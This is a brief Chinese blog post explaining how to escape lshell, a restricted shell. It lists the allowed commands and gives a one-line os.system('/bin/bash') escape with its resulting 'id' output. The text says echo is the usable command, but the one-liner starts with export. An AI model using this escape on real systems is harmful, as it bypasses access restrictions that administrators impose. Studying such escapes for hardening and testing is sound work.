首页 > 系统相关 >lshell escape

lshell escape

时间:2023-03-28 12:45:53浏览次数:51  
标签:help escape echo lshell user 受限

lshell(Limited Shell) escape

 

lshell是表示当前用户的shell是受限的,只能执行几个指定的指令

可参考Lshell - aldeid

 

先确定自己是否被受限

user:~$ help
cd  clear  echo  exit  help  ll  lpath  ls

user:~$ help help
Limited Shell (lshell) limited help.

 

这里可以执行echo

便可以一句话脱离受限的shell

export os.system('/bin/bash')

user@lshell:~$ id
uid=1000(user) gid=1000(user) 

 

标签:help,escape,echo,lshell,user,受限
From: https://www.cnblogs.com/jhinjax/p/17264726.html

相关文章